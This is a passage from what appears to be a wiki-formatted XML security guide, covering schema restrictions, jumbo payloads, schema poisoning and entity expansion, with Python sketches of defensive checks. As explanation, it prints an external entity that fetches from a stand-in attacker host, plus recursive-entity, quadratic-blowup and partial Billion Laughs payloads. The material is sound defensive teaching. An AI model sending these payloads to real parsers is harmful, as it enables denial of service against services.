    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
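With this schema, a price set to Infinity or NaN will not trigger any errors in the application, because these are not valid &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; values and the document is rejected during validation. An attacker can exploit this issue when those values are allowed.&lt;br /&gt;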
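&lt;br /&gt;
The same distinction exists in application code. In the Python sketch below, the regular expression is an approximation of the lexical form of &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; written for this example, and &amp;lt;tt&amp;gt;parse_price&amp;lt;/tt&amp;gt; is a hypothetical helper; the point is that a floating point conversion would accept the special values while a decimal-only check does not.&lt;br /&gt;
```python
import re
from decimal import Decimal

# Approximate lexical form of xs:decimal: optional sign, digits, optional fraction.
DECIMAL_PATTERN = re.compile(r"[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)")


def parse_price(text: str) -> Decimal:
    """Accept plain decimal numbers only; reject NaN, INF and similar."""
    if DECIMAL_PATTERN.fullmatch(text) is None:
        raise ValueError(f"not a decimal value: {text!r}")
    return Decimal(text)


if __name__ == "__main__":
    print(parse_price("10.50"))
    # float() would accept these special values; parse_price() rejects them.
    for special in ("NaN", "INF", "-INF"):
        try:
            parse_price(special)
        except ValueError as error:
            print(error)
```
Any arithmetic performed on a price that passed this check operates on a finite number.&lt;br /&gt;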
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a specific length (let's say 8), the exact length can be specified as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values from &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; to &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be accepted as an SSN, because a &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; must match the entire value.&lt;br /&gt;
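&lt;br /&gt;
When the same check has to be repeated in application code, the pattern can be reused almost verbatim. The following Python sketch is only an illustration: the helper name &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt; is hypothetical, and it assumes the value has already been extracted from the document as a string.&lt;br /&gt;

```python
import re

# Same expression as the xs:pattern facet above. A schema pattern must match
# the entire value, so re.fullmatch is used instead of re.search.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(value):
    """Return True only when the whole string matches the SSN pattern."""
    return SSN_PATTERN.fullmatch(value) is not None


print(is_valid_ssn("123-45-6789"))    # True
print(is_valid_ssn("123-45-67890"))   # False: one digit too many
print(is_valid_ssn("x123-45-6789"))   # False: unexpected leading character
```

Using a partial match here would silently accept longer strings that merely contain a valid SSN, which is the kind of gap the schema restriction is meant to close.&lt;br /&gt;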
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, introduced in XML Schema 1.1, constrain the existence and values of related elements and attributes in XML schemas. An element or attribute is valid with regard to an assertion only if the test evaluates to true without raising an error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; references the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above described the consequences of allowing the zero value in denominators and proposed a data type containing only positive values. An alternative is to accept the entire range of numbers except zero. To avoid triggering and disclosing potential errors, values can be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; that disallows the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is never zero, while still allowing negative numbers as valid denominators.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Failing to define a maximum number of occurrences forces the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could use a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt;, and if there is no limit on the maximum number, it could use a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
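&lt;br /&gt;
Where the schema cannot be changed, a limit can also be enforced while the document is being read. The following Python sketch assumes the &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; element names from the schema above. The constant &amp;lt;tt&amp;gt;MAX_BUY_ELEMENTS&amp;lt;/tt&amp;gt; and both helper functions are hypothetical names chosen for illustration, and the limit itself is an arbitrary value.&lt;br /&gt;

```python
import io
import xml.etree.ElementTree as ET

MAX_BUY_ELEMENTS = 1000  # hypothetical limit; choose one that fits the application


def build_operation(count):
    """Build an operation document with the given number of buy elements."""
    root = ET.Element("operation")
    for i in range(count):
        buy = ET.SubElement(root, "buy")
        ET.SubElement(buy, "id").text = str(i)
        ET.SubElement(buy, "price").text = "1.00"
        ET.SubElement(buy, "quantity").text = "1"
    return ET.tostring(root)


def count_buys(document, limit=MAX_BUY_ELEMENTS):
    """Count buy elements while streaming and abort once the limit is exceeded."""
    seen = 0
    for _event, element in ET.iterparse(io.BytesIO(document), events=("end",)):
        if element.tag == "buy":
            seen += 1
            if seen > limit:
                raise ValueError("too many buy elements")
            element.clear()  # drop the children of the element just processed
    return seen


print(count_buys(build_operation(5)))  # 5
```

Streaming with &amp;lt;tt&amp;gt;iterparse&amp;lt;/tt&amp;gt; lets the check fail early instead of after the whole tree has been built in memory. It does not replace the DTD-related protections discussed elsewhere in this document.&lt;br /&gt;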
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending a 1 GB XML document may require only about a second of server processing and might not be worth considering as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic needed to generate the attack, relative to the CPU or traffic the server spends handling the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
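&lt;br /&gt;
A common first line of defense against documents of this kind is to cap the number of bytes accepted before parsing starts. The following Python sketch is a minimal illustration under stated assumptions: &amp;lt;tt&amp;gt;MAX_DOCUMENT_BYTES&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;read_limited&amp;lt;/tt&amp;gt; are hypothetical names, and the limit is an arbitrary value.&lt;br /&gt;

```python
import io

MAX_DOCUMENT_BYTES = 1_000_000  # hypothetical limit; tune to the largest legitimate document


def read_limited(stream, limit=MAX_DOCUMENT_BYTES):
    """Read at most limit bytes and raise if the stream holds more."""
    data = stream.read(limit + 1)  # one extra byte reveals an oversized input
    if len(data) > limit:
        raise ValueError("document exceeds size limit")
    return data


print(len(read_limited(io.BytesIO(b"abc"))))  # 3
```

A size cap only bounds what is received. It does not bound what a parser may generate or fetch while processing the document.&lt;br /&gt;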
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, these consequences will be more dangerous if the schema is a DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema.&lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files from the server. This type of schema only serves as a suggestion for the structure of a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often avoid the risk of using remotely tampered versions by processing a local schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
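&lt;br /&gt;
A check of this kind can be automated before a local schema is loaded. The following Python sketch is an illustration for POSIX systems only. The function name &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; is hypothetical, and the temporary file merely stands in for &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt;.&lt;br /&gt;

```python
import os
import stat
import tempfile


def is_world_writable(path):
    """Return True when users outside the owner and group may write to path."""
    mode = os.stat(path).st_mode
    # stat.filemode renders the mode as in ls -l, for example "-rw-rw-rw-";
    # index 8 is the write flag for other users.
    return stat.filemode(mode)[8] == "w"


# Demonstration on a temporary file standing in for note.dtd.
with tempfile.TemporaryDirectory() as directory:
    schema = os.path.join(directory, "note.dtd")
    with open(schema, "w") as handle:
        handle.write("")
    os.chmod(schema, 0o666)
    print(is_world_writable(schema))  # True
    os.chmod(schema, 0o644)
    print(is_world_writable(schema))  # False
```

An application could refuse to start, or at least log a warning, when a schema it depends on is writable by other users.&lt;br /&gt;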
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch content different from the one originally intended.&lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When XML documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee (or by an external attacker in control of these files) could impact all users processing the schemas. Consequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is a DTD).&lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; refers to another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and the definition of &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; refers back to &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities. The XML specification forbids recursive entity references, so a conforming parser must reject such a document rather than try to expand it:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The following attack expands to 100,000 * 100,000 = 10^10 characters in memory:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
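&lt;br /&gt;
The arithmetic behind this attack can be sketched in a few lines of Python. The constant names are hypothetical, and the calculation ignores the small overhead of the surrounding markup:&lt;br /&gt;

```python
ENTITY_LENGTH = 100_000    # characters in the replacement text of entity A
REFERENCE_COUNT = 100_000  # number of references to A in the document body
REFERENCE_SIZE = 3         # each reference is three characters: ampersand, A, semicolon

# Approximate size of what the attacker sends versus what the parser builds.
document_size = ENTITY_LENGTH + REFERENCE_COUNT * REFERENCE_SIZE
expanded_size = ENTITY_LENGTH * REFERENCE_COUNT

print(document_size)                   # 400000
print(expanded_size)                   # 10000000000
print(expanded_size // document_size)  # 25000
```

Under these assumptions, a document of roughly 400 KB expands to about 10 GB of character data, an amplification factor of 25,000.&lt;br /&gt;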
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
